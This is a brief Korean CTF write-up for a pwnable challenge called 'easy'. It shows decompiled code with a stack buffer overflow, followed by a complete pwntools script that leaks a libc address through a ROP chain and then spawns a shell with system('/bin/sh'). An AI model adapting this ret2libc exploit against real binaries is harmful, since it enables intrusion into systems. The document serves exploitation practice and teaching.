엄청 쉬운문제 인데 이상한데서 막혀서 삽질했습니다.
ssize_t sub_400A76()
{
__int64 buf; // [rsp+0h] [rbp-10h]
__int64 v2; // [rsp+8h] [rbp-8h]
if ( memcmp(s1, &unk_602100, 0x20uLL) )
exit(-1);
buf = 0LL;
v2 = 0LL;
write(1, "> ", 2uLL);
return read(0, &buf, 0x38uLL); // overflow
}
대충. 취약점이 터지는함수
너무 간단해서 조건만 맞춰주면 풀리는 문제입니다.
#!/usr/bin/env python2
#-*-coding:utf8-*-
from pwn import *
#context.log_level = 'debug'
r = process('./easy')
e = ELF('./easy')
libc = e.libc
puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = 0x400ADD
pop_rdi = 0x400BE3
r.sendlineafter('>', str(1))
r.sendlineafter('>', 'a'*0x20)
r.sendlineafter('>', str(3))
r.sendlineafter('>', 'a'*0x40)
r.sendlineafter('>', str(4919))
payload = 'a'*(0x10 + 0x8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendline(payload)
leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
base = leak - libc.symbols['puts']
system = base + libc.symbols['system']
binsh = base + libc.search('/bin/sh').next()
log.success('leak addr : {}'.format(hex(leak)))
log.success('base addr : {}'.format(hex(base)))
log.success('system addr : {}'.format(hex(system)))
log.success('binsh addr : {}'.format(hex(binsh)))
r.sendlineafter('>', str(3))
r.sendlineafter('>', 'a'*0x40)
r.sendlineafter('>', str(4919))
payload = 'a'*(0x10 + 0x8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
r.sendline(payload)
r.interactive()